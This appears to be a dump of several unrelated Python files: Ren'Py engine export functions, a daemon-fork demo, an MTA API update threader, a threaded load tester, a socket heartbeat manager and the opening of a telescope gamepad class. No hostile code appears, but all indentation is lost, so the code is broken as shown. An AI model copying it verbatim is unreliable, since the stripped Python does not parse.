call_in_new_context = renpy.game.call_in_new_context
curried_call_in_new_context = renpy.curry.curry(renpy.game.call_in_new_context)
invoke_in_new_context = renpy.game.invoke_in_new_context
curried_invoke_in_new_context = renpy.curry.curry(renpy.game.invoke_in_new_context)
call_replay = renpy.game.call_replay
renpy_pure("curried_call_in_new_context")
renpy_pure("curried_invoke_in_new_context")
# Error handling stuff.
def _error(msg):
raise Exception(msg)
_error_handlers = [ _error ]
def push_error_handler(eh):
_error_handlers.append(eh)
def pop_error_handler():
_error_handlers.pop()
def error(msg):
"""
:doc: lint
Reports `msg`, a string, as as error for the user. This is logged as a
parse or lint error when approprate, and otherwise it is raised as an
exception.
"""
_error_handlers[-1](msg)
def timeout(seconds):
"""
:doc: udd_utility
Causes an event to be generated before `seconds` seconds have elapsed.
This ensures that the event method of a user-defined displayable will be
called.
"""
renpy.game.interface.timeout(seconds)
def end_interaction(value):
"""
:doc: udd_utility
If `value` is not None, immediately ends the current interaction, causing
the interaction to return `value`. If `value` is None, does nothing.
This can be called from inside the render and event methods of a
creator-defined displayable.
"""
if value is None:
return
raise renpy.display.core.EndInteraction(value)
def scry():
"""
:doc: other
Returns the scry object for the current statement.
The scry object tells Ren'Py about things that must be true in the
future of the current statement. Right now, the scry object has one
field:
``nvl_clear``
Is true if an ``nvl clear`` statement will execute before the
next interaction.
"""
name = renpy.game.context().current
node = renpy.game.script.lookup(name)
return node.scry()
@renpy_pure
def munged_filename():
return renpy.parser.munge_filename(get_filename_line()[0])
# Module loading stuff.
loaded_modules = set()
def load_module(name, **kwargs):
"""
:doc: other
This loads the Ren'Py module named name. A Ren'Py module consists of Ren'Py script
that is loaded into the usual (store) namespace, contained in a file named
name.rpym or name.rpymc. If a .rpym file exists, and is newer than the
corresponding .rpymc file, it is loaded and a new .rpymc file is created.
All of the init blocks (and other init-phase code) in the module are run
before this function returns. An error is raised if the module name cannot
be found, or is ambiguous.
Module loading may only occur from inside an init block.
"""
if not renpy.game.context().init_phase:
raise Exception("Module loading is only allowed in init code.")
if name in loaded_modules:
return
loaded_modules.add(name)
old_locked = renpy.config.locked
renpy.config.locked = False
initcode = renpy.game.script.load_module(name)
context = renpy.execution.Context(False)
context.init_phase = True
renpy.game.contexts.append(context)
context.make_dynamic(kwargs)
renpy.store.__dict__.update(kwargs) # @UndefinedVariable
for prio, node in initcode: # @UnusedVariable
if isinstance(node, renpy.ast.Node):
renpy.game.context().run(node)
else:
node()
context.pop_all_dynamic()
renpy.game.contexts.pop()
renpy.config.locked = old_locked
def load_string(s, filename="<string>"):
"""
:doc: other
Loads `s` as Ren'Py script that can be called.
Returns the name of the first statement in s.
`filename` is the name of the filename that statements in the string will
appear to be from.
"""
old_exception_info = renpy.game.exception_info
try:
old_locked = renpy.config.locked
renpy.config.locked = False
stmts, initcode = renpy.game.script.load_string(filename, unicode(s))
if stmts is None:
return None
context = renpy.execution.Context(False)
context.init_phase = True
renpy.game.contexts.append(context)
for prio, node in initcode: # @UnusedVariable
if isinstance(node, renpy.ast.Node):
renpy.game.context().run(node)
else:
node()
context.pop_all_dynamic()
renpy.game.contexts.pop()
renpy.config.locked = old_locked
renpy.game.script.analyze()
return stmts[0].name
finally:
renpy.game.exception_info = old_exception_info
def pop_call():
"""
:doc: other
:name: renpy.pop_call
Pops the current call from the call stack, without returning to
the location.
This can be used if a label that is called decides not to return
to its caller.
"""
renpy.game.context().pop_call()
pop_return = pop_call
def call_stack_depth():
"""
:doc: other
Returns the depth of the call stack of the current context - the number
of calls that have run without being returned from or popped from the
call stack.
"""
return len(renpy.game.context().return_stack)
def game_menu(screen=None):
"""
:undocumented: Probably not what we want in the presence of
screens.
"""
if screen is None:
call_in_new_context("_game_menu")
else:
call_in_new_context("_game_menu", _game_menu_screen=screen)
def shown_window():
"""
:doc: other
Call this to indicate that the window has been shown. This interacts
with the "window show" statement, which shows an empty window whenever
this functions has not been called during an interaction.
"""
renpy.game.context().scene_lists.shown_window = True
class placement(renpy.python.RevertableObject):
def __init__(self, p):
super(placement, self).__init__()
self.xpos = p[0]
self.ypos = p[1]
self.xanchor = p[2]
self.yanchor = p[3]
self.xoffset = p[4]
self.yoffset = p[5]
self.subpixel = p[6]
@property
def pos(self):
return self.xpos, self.ypos
@property
def anchor(self):
return self.xanchor, self.yanchor
@property
def offset(self):
return self.xoffset, self.yoffset
def get_placement(d):
"""
:doc: image_func
This gets the placement of displayable d. There's very little warranty on this
information, as it might change when the displayable is rendered, and might not
exist until the displayable is first rendered.
This returns an object with the following fields, each corresponding to a style
property:
* pos
* xpos
* ypos
* anchor
* xanchor
* yanchor
* offset
* xoffset
* yoffset
* subpixel
"""
p = d.get_placement()
return placement(p)
def get_image_bounds(tag, width=None, height=None, layer='master'):
"""
:doc: image_func
If an image with `tag` exists on `layer`, returns the bounding box of
that image. Returns None if the image is not found.
The bounding box is an (x, y, width, height) tuple. The components of
the tuples are expressed in pixels, and may be floating point numbers.
`width`, `height`
The width and height of the area that contains the image. If None,
defaults the width and height of the screen, respectively.
`layer`
If None, uses the default layer for `tag`.
"""
tag = tag.split()[0]
layer = default_layer(layer, tag)
if width is None:
width = renpy.config.screen_width
if height is None:
height = renpy.config.screen_height
return scene_lists().get_image_bounds(layer, tag, width, height)
# User-Defined Displayable stuff.
Render = renpy.display.render.Render
render = renpy.display.render.render
IgnoreEvent = renpy.display.core.IgnoreEvent
redraw = renpy.display.render.redraw
class Displayable(renpy.display.core.Displayable, renpy.python.RevertableObject):
pass
class Container(renpy.display.core.Displayable, renpy.python.RevertableObject):
_list_type = renpy.python.RevertableList
def get_roll_forward():
return renpy.game.interface.shown_window
def cache_pin(*args):
"""
:undocumented: Cache pin is deprecated.
"""
new_pins = renpy.python.RevertableSet()
for i in args:
im = renpy.easy.displayable(i)
if not isinstance(im, renpy.display.im.ImageBase):
raise Exception("Cannot pin non-image-manipulator %r" % im)
new_pins.add(im)
renpy.store._cache_pin_set = new_pins | renpy.store._cache_pin_set
def cache_unpin(*args):
"""
:undocumented: Cache pin is deprecated.
"""
new_pins = renpy.python.RevertableSet()
for i in args:
im = renpy.easy.displayable(i)
if not isinstance(im, renpy.display.im.ImageBase):
raise Exception("Cannot unpin non-image-manipulator %r" % im)
new_pins.add(im)
renpy.store._cache_pin_set = renpy.store._cache_pin_set - new_pins
def expand_predict(d):
"""
:undocumented:
Use the fnmatch function to expland `d` for the purposes of prediction.
"""
if not isinstance(d, basestring):
return [ d ]
if not "*" in d:
return [ d ]
if "." in d:
l = list_files(False)
else:
l = list_images()
return fnmatch.filter(l, d)
def start_predict(*args):
"""
:doc: image_func
This function takes one or more displayables as arguments. It causes
Ren'Py to predict those displayables during every interaction until
the displayables are removed by :func:`renpy.stop_predict`.
If a displayable name is a string containing one or more \\*
characters, the asterisks are used as a wildcard pattern. If there
is at least one . in the string, the pattern is matched against
filenames, otherwise it is matched against image names.
For example::
$ renpy.start_predict("eileen *")
starts predicting all images with the name eileen, while::
$ renpy.start_predict("images/concert*.*")
matches all files starting with concert in the images directory.
"""
new_predict = renpy.python.RevertableSet(renpy.store._predict_set)
for i in args:
for d in expand_predict(i):
d = renpy.easy.displayable(d)
new_predict.add(d)
renpy.store._predict_set = new_predict
def stop_predict(*args):
"""
:doc: image_func
This function takes one or more displayables as arguments. It causes
Ren'Py to stop predicting those displayables during every interaction.
Wildcard patterns can be used as described in :func:`renpy.start_predict`.
"""
new_predict = renpy.python.RevertableSet(renpy.store._predict_set)
for i in args:
for d in expand_predict(i):
d = renpy.easy.displayable(d)
new_predict.discard(d)
renpy.store._predict_set = new_predict
def start_predict_screen(_screen_name, *args, **kwargs):
"""
:doc: screens
Causes Ren'Py to start predicting the screen named `_screen_name`
will be shown with the given arguments. This replaces any previous prediction
of `_screen_name`. To stop predicting a screen, call :func:`renpy.stop_predict_screen`.
"""
new_predict = renpy.python.RevertableDict(renpy.store._predict_screen)
new_predict[_screen_name] = (args, kwargs)
renpy.store._predict_screen = new_predict
def stop_predict_screen(name):
"""
:doc: screens
Causes Ren'Py to stop predicting the screen named `name` will be shown.
"""
new_predict = renpy.python.RevertableDict(renpy.store._predict_screen)
new_predict.pop(name, None)
renpy.store._predict_screen = new_predict
def call_screen(_screen_name, *args, **kwargs):
"""
:doc: screens
The programmatic equivalent of the call screen statement.
This shows `_screen_name` as a screen, then causes an interaction
to occur. The screen is hidden at the end of the interaction, and
the result of the interaction is returned.
Keyword arguments not beginning with _ are passed to the scope of
the screen.
If the keyword argument `_with_none` is false, "with None" is not
run at the end of end of the interaction.
"""
renpy.exports.mode('screen')
with_none = renpy.config.implicit_with_none
if "_with_none" in kwargs:
with_none = kwargs.pop("_with_none")
show_screen(_screen_name, _transient=True, *args, **kwargs)
roll_forward = renpy.exports.roll_forward_info()
try:
rv = renpy.ui.interact(mouse="screen", type="screen", roll_forward=roll_forward)
except (renpy.game.JumpException, renpy.game.CallException) as e:
rv = e
renpy.exports.checkpoint(rv)
if with_none:
renpy.game.interface.do_with(None, None)
if isinstance(rv, (renpy.game.JumpException, renpy.game.CallException)):
raise rv
return rv
@renpy_pure
def list_files(common=False):
"""
:doc: file
Lists the files in the game directory and archive files. Returns
a list of files, with / as the directory separator.
`common`
If true, files in the common directory are included in the
listing.
"""
rv = [ ]
for dir, fn in renpy.loader.listdirfiles(common): # @ReservedAssignment
if fn.startswith("saves/"):
continue
rv.append(fn)
rv.sort()
return rv
def get_renderer_info():
"""
:doc: other
Returns a dictionary, giving information about the renderer Ren'Py is
currently using. The dictionary has one required key:
``"renderer"``
One of ``"gl"`` or ``"sw"``, corresponding to the OpenGL and
software renderers, respectively.
``"resizable"``
True if and only if the window is resizable.
``"additive"``
True if and only if the renderer supports additive blending.
Other, renderer-specific, keys may also exist. The dictionary should
be treated as immutable. This should only be called once the display
has been started (that is, after the init phase has finished).
"""
return renpy.display.draw.info
def display_reset():
"""
:undocumented: Used internally.
Causes the display to be restarted at the start of the next interaction.
"""
renpy.display.interface.display_reset = True
def mode(mode):
"""
:doc: modes
Causes Ren'Py to enter the named mode, or stay in that mode if it's
already in it.
"""
ctx = renpy.game.context()
if not ctx.use_modes:
return
modes = ctx.modes
try:
ctx.use_modes = False
if mode != modes[0]:
for c in renpy.config.mode_callbacks:
c(mode, modes)
finally:
ctx.use_modes = True
if mode in modes:
modes.remove(mode)
modes.insert(0, mode)
def get_mode():
"""
:doc: modes
Returns the current mode, or None if it is not defined.
"""
ctx = renpy.game.context()
if not ctx.use_modes:
return None
modes = ctx.modes
return modes[0]
def notify(message):
"""
:doc: other
Causes Ren'Py to display the `message` using the notify screen. By
default, this will cause the message to be dissolved in, displayed
for two seconds, and dissolved out again.
This is useful for actions that otherwise wouldn't produce feedback,
like screenshots or quicksaves.
Only one notification is displayed at a time. If a second notification
is displayed, the first notification is replaced.
"""
hide_screen('notify')
show_screen('notify', message=message)
restart_interaction()
@renpy_pure
def variant(name):
"""
:doc: screens
Returns true if a `name` is a screen variant that can be chosen
by Ren'Py. See :ref:`screen-variants` for more details. This function
can be used as the condition in a Python if statement to set up the
appropriate styles for the selected screen variant.
`name` can also be a list of variants, in which case this function
returns True if any of the variants is selected.
"""
if isinstance(name, basestring):
return name in renpy.config.variants
else:
for n in name:
if n in renpy.config.variants:
return True
return False
def vibrate(duration):
"""
:doc: other
Causes the device to vibrate for `duration` seconds. Currently, this
is only supported on Android.
"""
try:
import android # @UnresolvedImport
android.vibrate(duration)
except:
pass
def get_say_attributes():
"""
:doc: other
Gets the attributes associated with the current say statement, or
None if no attributes are associated with this statement.
This is only valid when executing or predicting a say statement.
"""
return renpy.game.context().say_attributes
def get_side_image(prefix_tag, image_tag=None, not_showing=True, layer=None):
"""
:doc: other
This attempts to find an image to show as the side image.
It begins by determining a set of image attributes. If `image_tag` is
given, it gets the image attributes from the tag. Otherwise, it gets
them from the currently showing character.
It then looks up an image with the tag `prefix_tag` and those attributes,
and returns it if it exists.
If not_showing is True, this only returns a side image if the image the
attributes are taken from is not on the screen.
If `layer` is None, uses the default layer for the currently showing
tag.
"""
images = renpy.game.context().images
if image_tag is not None:
image_layer = default_layer(layer, image_tag)
attrs = (image_tag,) + images.get_attributes(image_layer, image_tag)
else:
attrs = renpy.store._side_image_attributes
if not attrs:
return None
attr_layer = default_layer(layer, attrs)
if not_showing and images.showing(attr_layer, (attrs[0], )):
return None
required = set()
optional = set(attrs)
return images.choose_image(prefix_tag, required, optional, None)
def get_physical_size():
"""
:doc: other
Returns the size of the physical window.
"""
return renpy.display.draw.get_physical_size()
def set_physical_size(size):
"""
:doc: other
Attempts to set the size of the physical window to `size`. This has the
side effect of taking the screen out of fullscreen mode.
"""
renpy.game.preferences.fullscreen = False
if get_renderer_info()["resizable"]:
renpy.display.interface.set_mode(size)
renpy.display.interface.last_resize = size
def reset_physical_size():
"""
:doc: other
Attempts to set the size of the physical window to the specified values
in renpy.config. (That is, screen_width and screen_height.) This has the
side effect of taking the screen out of fullscreen mode.
"""
renpy.game.preferences.fullscreen = False
if get_renderer_info()["resizable"]:
renpy.display.interface.set_mode((renpy.config.screen_width, renpy.config.screen_height))
@renpy_pure
def fsencode(s):
"""
:doc: file_rare
:name: renpy.fsencode
Converts s from unicode to the filesystem encoding.
"""
if not isinstance(s, unicode):
return s
fsencoding = sys.getfilesystemencoding() or "utf-8"
return s.encode(fsencoding, "replace")
@renpy_pure
def fsdecode(s):
"""
:doc: file_rare
:name: renpy.fsdecode
Converts s from filesystem encoding to unicode.
"""
if not isinstance(s, str):
return s
fsencoding = sys.getfilesystemencoding() or "utf-8"
return s.decode(fsencoding)
from renpy.editor import launch_editor # @UnusedImport
def get_image_load_log(age=None):
"""
:doc: other
A generator that yields a log of image loading activity. For the last 100
image loads, this returns:
* The time the image was loaded (in seconds since the epoch).
* The filename of the image that was loaded.
* A boolean that is true if the image was preloaded, and false if the
game stalled to load it.
The entries are ordered from newest to oldest.
`age`
If not None, only images that have been loaded in the past `age`
seconds are included.
The image load log is only kept if config.developer = True.
"""
if age is not None:
deadline = time.time() - age
else:
deadline = 0
for i in renpy.display.im.cache.load_log:
if i[0] < deadline:
break
yield i
def end_replay():
"""
:doc: replay
If we're in a replay, ends the replay immediately. Otherwise, does
nothing.
"""
if renpy.store._in_replay:
raise renpy.game.EndReplay()
def save_persistent():
"""
:doc: persistent
Saves the persistent data to disk.
"""
renpy.persistent.update(True)
def is_seen(ever=True):
"""
:doc: other
Returns true if the current line has been seen by the player.
If `ever` is true, we check to see if the line has ever been seen by the
player. If false, we check if the line has been seen in the current
play-through.
"""
return renpy.game.context().seen_current(ever)
def get_mouse_pos():
"""
:doc: other
Returns an (x, y) tuple giving the location of the mouse pointer or the
current touch location. If the device does not support a mouse and is not
currently being touched, x and y are numbers, but not meaningful.
"""
return renpy.display.draw.get_mouse_pos()
def set_mouse_pos(x, y, duration=0):
"""
:doc: other
Jump the mouse pointer to the location given by arguments x and y.
If the device does not have a mouse pointer, this does nothing.
`duration`
The time it will take to perform the move, in seconds.
During this time, the mouse may be unresponsive.
"""
renpy.display.interface.set_mouse_pos(x, y, duration)
def set_autoreload(autoreload):
"""
:doc: other
Sets the autoreload flag, which determines if the game will be
automatically reloaded after file changes. Autoreload will not be
fully enabled until the game is reloaded with :func:`renpy.utter_restart`.
"""
renpy.autoreload = autoreload
def get_autoreload():
"""
:doc: other
Gets the autoreload flag.
"""
return renpy.autoreload
def count_dialogue_blocks():
"""
:doc: other
Returns the number of dialogue blocks in the game's original language.
"""
return renpy.game.script.translator.count_translates()
def count_seen_dialogue_blocks():
"""
:doc: other
Returns the number of dialogue blocks the user has seen in any play-through
of the current game.
"""
return renpy.game.seen_translates_count
def count_newly_seen_dialogue_blocks():
"""
:doc: other
Returns the number of dialogue blocks the user has seen for the first time
during this session.
"""
return renpy.game.new_translates_count
def substitute(s, scope=None, translate=True):
"""
:doc: other
Applies translation and new-style formatting to the string `s`.
`scope`
If not None, a scope which is used in formatting, in addition to the
default store.
`translate`
Determines if translation occurs.
Returns the translated and formatted string.
"""
return renpy.substitutions.substitute(s, scope=scope, translate=translate)[0]
def munge(name, filename=None):
"""
:doc: other
Munges `name`, which must begin with __.
`filename`
The filename the name is munged into. If None, the name is munged
into the filename containing the call to this function.
"""
if filename is None:
filename = sys._getframe(1).f_code.co_filename
if not name.startswith("__"):
return name
if name.endswith("__"):
return name
return renpy.parser.munge_filename(filename) + name[2:]
def get_return_stack():
"""
:doc: label
Returns a list giving the current return stack. The return stack is a
list of statement names.
The statement names will be strings (for labels), or opaque tuples (for
non-label statements).
"""
return renpy.game.context().get_return_stack()
def set_return_stack(stack):
"""
:doc: label
Sets the current return stack. The return stack is a list of statement
names.
Statement names may be strings (for labels) or opaque tuples (for
non-label statements).
"""
renpy.game.context().set_return_stack(stack)
def invoke_in_thread(fn, *args, **kwargs):
"""
:doc: other
Invokes the function `fn` in a background thread, passing it the
provided arguments and keyword arguments. Restarts the interaction
once the thread returns.
This function creates a daemon thread, which will be automatically
stopped when Ren'Py is shutting down.
"""
def run():
try:
fn(*args, **kwargs)
except:
import traceback
traceback.print_exc()
restart_interaction()
t = threading.Thread(target=run)
t.daemon = True
t.start()
def cancel_gesture():
"""
:doc: gesture
Cancels the current gesture, preventing the gesture from being recognized.
This should be called by displayables that have gesture-like behavior.
"""
renpy.display.gesture.recognizer.cancel() # @UndefinedVariable
def execute_default_statement(start=False):
"""
:undocumented:
Executes the default statement.
"""
for i in renpy.ast.default_statements:
i.set_default(start)
def write_log(s, *args):
"""
:undocumented:
Writes to log.txt.
"""
renpy.display.log.write(s, *args)
def predicting():
"""
:doc: screens
Returns true if Ren'Py is currently predicting the screen.
"""
return renpy.display.predict.predicting
def get_line_log():
"""
:undocumented:
Returns the list of lines that have been shown since the last time
:func:`renpy.clear_line_log` was called.
"""
return renpy.game.context().line_log[:]
def clear_line_log():
"""
:undocumented:
Clears the line log.
"""
renpy.game.context().line_log = [ ]
def add_layer(layer, above=None, below=None, menu_clear=True):
"""
:doc: other
Adds a new layer to the screen. If the layer already exists, this
function does nothing.
One of `behind` or `above` must be given.
`layer`
A string giving the name of the new layer to add.
`above`
If not None, a string giving the name of a layer the new layer will
be placed above.
`below`
If not None, a string giving the name of a layer the new layer will
be placed below.
`menu_clear`
If true, this layer will be cleared when entering the game menu
context, and restored when leaving the
"""
layers = renpy.config.layers
if layer in renpy.config.layers:
return
if (above is not None) and (below is not None):
raise Exception("The above and below arguments to renpy.add_layer are mutually exclusive.")
elif above is not None:
try:
index = layers.index(above) + 1
except ValueError:
raise Exception("Layer '%s' does not exist." % above)
elif below is not None:
try:
index = layers.index(below)
except ValueError:
raise Exception("Layer '%s' does not exist." % below)
else:
raise Exception("The renpy.add_layer function requires either the above or below argument.")
layers.insert(index, layer)
if menu_clear:
renpy.config.menu_clear_layers.append(layer) # @UndefinedVariable
def maximum_framerate(t):
"""
:doc: other
Forces Ren'Py to draw the screen at the maximum framerate for `t` seconds.
If `t` is None, cancels the maximum framerate request.
"""
if renpy.display.interface is not None:
renpy.display.interface.maximum_framerate(t)
else:
if t is None:
renpy.display.core.initial_maximum_framerate = 0
else:
renpy.display.core.initial_maximum_framerate = max(renpy.display.core.initial_maximum_framerate, t)
def is_start_interact():
"""
:doc: other
Returns true if restart_interaction has not been called during the current
interaction. This can be used to determine if the interaction is just being
started, or has been restarted.
"""
return renpy.display.interface.start_interact
def play(filename, channel=None, **kwargs):
"""
:doc: audio
Plays a sound effect. If `channel` is None, it defaults to
:var:`config.play_channel`. This is used to play sounds defined in
styles, :propref:`hover_sound` and :propref:`activate_sound`.
"""
if filename is None:
return
if channel is None:
channel = renpy.config.play_channel
renpy.audio.music.play(filename, channel=channel, loop=False, **kwargs)
def get_editable_input_value():
"""
:undocumented:
Returns the current input value, and a flag that is true if it is editable.
and false otherwise.
"""
return renpy.display.behavior.current_input_value, renpy.display.behavior.input_value_active
def set_editable_input_value(input_value, editable):
"""
:undocumented:
Sets the currently active input value, and if it should be marked as
editable.
"""
renpy.display.behavior.current_input_value = input_value
renpy.display.behavior.input_value_active = editable
def get_refresh_rate(precision=5):
"""
:doc: other
Returns the refresh rate of the current screen, as a floating-point
number of frames per second.
`precision`
The raw data Ren'Py gets is number of frames per second, rounded down.
This means that a monitor that runs at 59.95 frames per second will
be reported at 59 fps. The precision argument reduces the precision
of this reading, such that the only valid readings are multiples of
the precision.
Since all monitor framerates tend to be multiples of 5 (25, 30, 60,
75, and 120), this likely will improve accuracy. Setting precision
to 1 disables this.
"""
precision *= 1.0
info = renpy.display.get_info()
rv = info.refresh_rate
rv = round(rv / precision) * precision
return rv
def get_identifier_checkpoints(identifier):
"""
:doc: rollback
Given a rollback_identifier from a HistoryEntry object, returns the number
of checkpoints that need to be passed to :func:`renpy.rollback` to reach
that identifier. Returns None of the identifier is not in the rollback
history.
"""
return renpy.game.log.get_identifier_checkpoints(identifier)
def get_adjustment(bar_value):
"""
:doc: other
Given `bar_value`, a :class:`BarValue`, returns the :func:`ui.adjustment`
if uses. The adjustment has the following to attributes defined:
.. attribute:: value
The current value of the bar.
.. attribute:: range
The current range of the bar.
"""
return bar_value.get_adjustment()
def get_skipping():
"""
:doc: other
Returns true if the Ren'Py is skipping, "fast" if Ren'Py is fast skipping,
and false if it is not skipping.
"""
return renpy.config.skipping
def get_texture_size():
"""
:undocumented:
Returns the number of bytes of memory locked up in OpenGL textures and the
number of textures that are defined.
"""
return renpy.display.draw.get_texture_size()
old_battery = False
def get_on_battery():
"""
:other:
Returns True if Ren'Py is running on a device that is powered by an internal
battery, or False if the device is being charged by some external source.
"""
global old_battery
pi = pygame_sdl2.power.get_power_info() # @UndefinedVariable
if pi.state == pygame_sdl2.POWERSTATE_UNKNOWN: # @UndefinedVariable
return old_battery
elif pi.state == pygame_sdl2.POWERSTATE_ON_BATTERY: # @UndefinedVariable
old_battery = True
return True
else:
old_battery = False
return False
def get_say_image_tag():
"""
:doc: image_func
Returns the tag corresponding to the currently speaking character (the
`image` argument given to that character). Returns None if no character
is speaking or the current speaking character does not have a corresponding
image tag.
"""
if renpy.store._side_image_attributes is None:
return None
return renpy.store._side_image_attributes[0]
def is_skipping():
"""
:doc: other
Returns True if Ren'Py is currently skipping (in fast or slow skip mode),
or False otherwise.
"""
return not not renpy.config.skipping
|
test_app.py
|
from tixte_foss import app
from multiprocessing import Process
import pytest
def test_run():
server = Process(target=app.run)
server.start()
server.terminate()
|
daemon_processes_cant_fork.py
|
#!/usr/bin/env python
# Daemon processes can't fork child processes in Python, because...
# Well, they just can't. We want to use daemons though to avoid hanging
# processes if, for some reason, communication of termination conditions
# fails.
#
# Patchy McPatchface to the rescue (no, I am not kidding): we remove
# that useless assert (of all things!) on the fly.
#
# NOTE: while this works, we seem to have the socketpair-based detection
# stable enough to not need the monkeypatch.
#
#
# _daemon_fork_patch = '''\
# *** process_orig.py Sun Nov 20 20:02:23 2016
# --- process_fixed.py Sun Nov 20 20:03:33 2016
# ***************
# *** 5,12 ****
# assert self._popen is None, 'cannot start a process twice'
# assert self._parent_pid == os.getpid(), \\
# 'can only start a process object created by current process'
# - assert not _current_process._daemonic, \\
# - 'daemonic processes are not allowed to have children'
# _cleanup()
# if self._Popen is not None:
# Popen = self._Popen
# --- 5,10 ----
# '''
#
# import patchy
# patchy.mc_patchface(mp.Process.start, _daemon_fork_patch)
import os
import sys
import time
import multiprocessing as mp
def work_2():
print 'foo'
def work_1():
proc = mp.Process(target=work_2)
proc.start()
proc.join()
def test():
child = mp.Process(target=work_1)
child.daemon = True
# NOTE: we expect this to work out of the box.
# It does not.
child.start()
child.join()
if __name__ == '__main__':
test()
|
_mtapithreader.py
|
import threading, time, datetime, logging
logger = logging.getLogger(__name__)
class _MtapiThreader(object):
LOCK_TIMEOUT = 300
update_lock = threading.Lock()
update_lock_time = datetime.datetime.now()
def __init__(self, mtapi, expires_seconds=60):
self.mtapi = mtapi
self.EXPIRES_SECONDS = expires_seconds
def start_timer(self):
'''Start a long-lived thread to loop infinitely and trigger updates at
some regular interval.'''
logger.info('Starting update thread...')
self.timer_thread = threading.Thread(target=self.update_timer)
self.timer_thread.daemon = True
self.timer_thread.start()
def update_timer(self):
'''This method runs in its own thread. Run feed updates in short-lived
threads.'''
while True:
time.sleep(self.EXPIRES_SECONDS)
self.update_thread = threading.Thread(target=self.locked_update)
self.update_thread.start()
def locked_update(self):
if not self.update_lock.acquire(False):
logger.info('Update locked!')
lock_age = datetime.datetime.now() - self.update_lock_time
if lock_age.total_seconds() < self.LOCK_TIMEOUT:
return
else:
self.update_lock = threading.Lock()
logger.warn('Cleared expired update lock')
self.update_lock_time = datetime.datetime.now()
self.mtapi._update()
self.update_lock.release()
def restart_if_dead(self):
if not self.timer_thread.is_alive():
logger.warn('Timer died')
self.start_timer()
return True
return False
|
__init__.py
|
from datetime import datetime, timedelta
from dateutil import parser
from queue import Queue
from time import time, sleep
from threading import Thread
import json
# globals
json_log = []
class LoadTester:
def __init__(self,
duration_time,
request_time,
worker,
n_jobs: int = 30,
count: int = 10):
self.__count = count
self.__d_time = datetime.now() + timedelta(minutes=int(duration_time)),
self.__d_time = parser.parse(str(self.__d_time[0]))
self.__n_jobs = n_jobs
self.__q = Queue(self.__n_jobs * 2)
self.__request_time = request_time
self.__tasks_duration_per_iteration = 0
self.__tasks_finished = 0
self.__total_duration_per_task = 0
self.__worker = worker
def do_worker(self):
while True:
self.__q.get()
start_thread_time = time()
self.__worker()
thread_duration = time() - start_thread_time
self.__tasks_duration_per_iteration += thread_duration
self.__tasks_finished += 1
self.__q.task_done()
def start(self):
for i in range(self.__n_jobs):
thread = Thread(target=self.do_worker)
thread.daemon = True
thread.name = f"t{i}"
thread.start()
start_program_time = time()
iterations_count = 0
try:
print("starting iterations")
while True:
# counters
iterations_count += 1
self.__tasks_duration_per_iteration = 0
# starting to count time of the iteration
start_iteration_time = time()
for i in range(self.__count):
self.__q.put((i, i))
self.__q.join()
iteration_duration = time() - start_iteration_time
self.__total_duration_per_task += self.__tasks_duration_per_iteration
print(f"iteration {iterations_count} finished in {iteration_duration:.2f}s, "
f"average thread duration is {self.__tasks_duration_per_iteration / self.__n_jobs:.2f}s, "
f"sum of thread durations is {self.__tasks_duration_per_iteration:.2f}s")
request_data = {
"IterationNumber": f"{iterations_count}",
"Values": {
"RequestDone": f"{self.__count}",
"AverageDurationPerRequest": f"{iteration_duration:.2f}s",
"SumOfRequestDurations": f"{self.__tasks_duration_per_iteration:.2f}s"
}
}
json_log.append(request_data)
with open("request_log.json", "w+") as fl:
fl.write(json.dumps(json_log, indent=2))
if self.__d_time < datetime.now():
raise KeyboardInterrupt
sleep(self.__request_time)
except KeyboardInterrupt:
program_duration = time() - start_program_time
average_task_duration = self.__total_duration_per_task / self.__tasks_finished \
if self.__tasks_finished != 0 else 0
print("Program finished. Results:")
print(f"\tTotal time: {program_duration:.2f}s")
print(f"\tTasks accomplished: {self.__tasks_finished}")
print(f"\tAverage task duration: {average_task_duration:.2f}s")
|
bio_thread_io_manager.py
|
import socket
from bio_client import *
from socket_channel import *
import time
import threading
class BioThreadIoManager:
def __init__(self, s: socket, client):
self.client = client
self.socketChannel = SocketChannel(s)
self.running = False
def send(self, msg):
self.socketChannel.writeAndFlush(msg)
def close(self):
self.running = False
self.socketChannel.close()
def startThread(self):
self.running = True
self.heartbeatThread = threading.Thread(target=self.__heartbeat__)
self.ioloopThread = threading.Thread(target=self.__ioloop__)
self.heartbeatThread.start()
self.ioloopThread.start()
def __heartbeat__(self):
while self.running:
try:
self.send('heartbeat-' + self.client.userId)
except:
print('发送心跳失败')
time.sleep(10)
print ('heartbeat stop!')
self.close()
def __ioloop__(self):
while self.running:
try:
str = self.socketChannel.readLine()
self.client.onMessage(str)
except Exception as e:
print('连接发生异常 5s 后重新连接')
time.sleep(5)
self.client.reconnect()
break
print ("ioloop thread stop!")
self.close()
|
gamepad.py
|
"""Gamepad support.
Defines a single class Gamepad that provide support for game controller interfaces. When run as a
program the integrated x- and y- values are printed to the console.
"""
from datetime import datetime
import os
import signal
import threading
import time
from typing import List
import selectors
import inputs
import numpy as np
import click
from influxdb_client import Point
from track.telem import TelemSource
class Gamepad(TelemSource):
"""Class for interfacing with gamepads.
This class implements some useful functionality to allow a human to control
the telescope either fully manually or to interact with a control loop
by providing correction feedback.
Attributes:
left_x: A floating point value representing the x-axis position of the
left analog stick with values normalized to [-1.0, +1.0].
left_y: A floating point value representing the y-axis position of the
left analog stick with values normalized to [-1.0, +1.0].
right_x: A floating point value representing the x-axis position of the
right analog stick with values normalized to [-1.0, +1.0].
right_y: A floating point value representing the y-axis position of the
right analog stick with values normalized to [-1.0, +1.0].
int_x: The integrated value of the x-axes of both analog sticks.
int_y: The integrated value of the y-axes of both analog sticks.
left_gain: The gain applied to the left analog stick integrator input.
right_gain: The gain applied to the right analog stick integrator input.
int_loop_period: The period of the integrator thread loop in seconds.
int_limit: The integrators will be limited to this absolute value.
callbacks: A dict where keys are event codes and values are callback function handles.
state: A dict storing the last received event.state for each event.code.
gamepad: An instance of a gamepad object from the inputs package.
input_thread: A thread reading input from the gamepad.
integrator_thread: A thread for integrating the analog stick values.
integrator_mode: A boolean set to True when integrator mode is active.
running: Threads will stop executing when this is set to False.
sel: An object of type selectors.BaseSelector used to check if gamepad has data to read.
"""
MAX_ANALOG_VAL = 2**15
DEAD_ZONE_MAG = 256
def __init__(
self,
left_gain=1.0,
right_gain=0.1,
int_limit=1.0,
int_loop_period=0.1
):
"""Inits Gamepad object.
Initializes a Gamepad object and starts two daemon threads to read
input from the gamepad and to integrate the analog stick inputs. This
will use the first gamepad found by the inputs package.
Args:
left_gain: Gain for the left analog stick integrator input.
right_gain: Gain for the right analog stick integrator input.
